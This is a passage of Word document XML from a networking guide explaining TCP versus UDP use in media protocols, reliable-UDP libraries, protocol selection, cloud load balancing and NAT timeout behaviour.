        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 TCP for Control, UDP for Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E80C3FF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common pattern in media systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEBE4C8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B489A6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>┌─────────────────┐         ┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49117999" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│     Client      │         │     Server      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72C9AF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                 │         │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B01604" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Control (TCP)   │</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> Control (TCP)   </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  ← Session setup, auth, metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02497052" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                 │         │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666BD99" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Media (UDP/RTP) │</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> Media (UDP/RTP) </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> Audio/video data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E847F2F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>└─────────────────┘         └─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C100E6E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06826E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTSP (Real Time Streaming Protocol):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP for control commands (PLAY, PAUSE, TEARDOWN). RTP/UDP for media data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6822B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SIP (Session Initiation Protocol):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP or UDP for signaling. RTP/UDP for voice/video.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C54AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP control connection (port 21) + TCP data connection (port 20). (Both TCP here, but separate connections for different purposes.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC985BA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Reliable UDP Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671C2DB3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When you need UDP's performance but some reliability:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2384"/>
        <w:gridCol w:w="1436"/>
        <w:gridCol w:w="5530"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="288DECA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12130E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Library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71D08F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Language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5ADAF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2E010D1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BB7BE2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>ENet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8C6B10" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>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F4161D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Reliable/unreliable channels, sequencing, fragmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="33DCEE0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5FC175" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>KCP</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8D95BF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>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B69E1E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Fast reliable delivery (ARQ), configurable trade-offs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="13758C3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A3F8E1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Raknet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8F9904" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>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EE2104" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Game networking, reliable/ordered/sequenced channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="229CF59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91EEAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>LiteNetLib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7E5FFA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>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34E0B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Unity game networking, multiple channel types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="60193DF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857A8A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>QUIC (libquic, quiche)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BAE92E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Various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907D07" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Full transport protocol over UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436C5247" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Application-Level Protocol Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D4430" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Many protocols support BOTH and choose dynamically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054DA97A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> UDP by default. Falls back to TCP for large responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B5E1A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SIP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Can use UDP or TCP. UDP for small messages, TCP for large ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505C870" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RADIUS:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> UDP (legacy). DIAMETER (successor) uses TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E744FB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 and HTTP/2:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP. HTTP/3: UDP (QUIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E3848" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MQTT:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP (standard). MQTT-SN: UDP (for sensor networks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD21FF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="7C029347">
          <v:rect id="_x0000_i5026" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720F93B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. TCP and UDP in the Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706369B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Cloud Load Balancer Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469C0E9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP load balancing (L4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A7400" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>LB tracks connection state (5-tuple hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0F72C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>All packets of a connection go to the same backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66771E49" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection draining: LB waits for existing connections to close before removing a backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1C56B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Health checks: TCP connect (or HTTP over TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F46C1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP load balancing (L4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A2C63" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Stateless (typically): hash source IP + port → backend selection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5AD62" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Or flow-tracking (some LBs): remember the src→backend mapping for a timeout period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF92CCA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No "connection" to drain — just stop forwarding new datagrams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68383752" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Challenge: session affinity (need consistent hashing so same client always hits same backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF266C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS NLB UDP support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61CAB7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Supports UDP since 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA7AE9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Uses flow-tracking with 120-second idle timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A31D5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If no UDP packet flows for 120 seconds → mapping is cleared → next packet may go to a different backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11969585" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 NAT and Firewall Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2BA53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP through NAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2E607" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>NAT creates a mapping on SYN (outbound).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F9F9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Mapping is maintained for the connection's duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB3AA7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Timeout: often 5–60 minutes of idle (TCP keepalive prevents timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5F2BB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Well-understood, all NATs handle TCP correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDD682" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP through NAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B2C9E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>NAT creates a mapping on first outbound packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B78BF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Mapping timeout: typically 30–120 seconds of idle (much shorter than TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA41EF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If no UDP packets flow for the timeout → mapping is cleared → inbound packets from the server are dropped.</w:t>
      </w:r>
    </w:p>
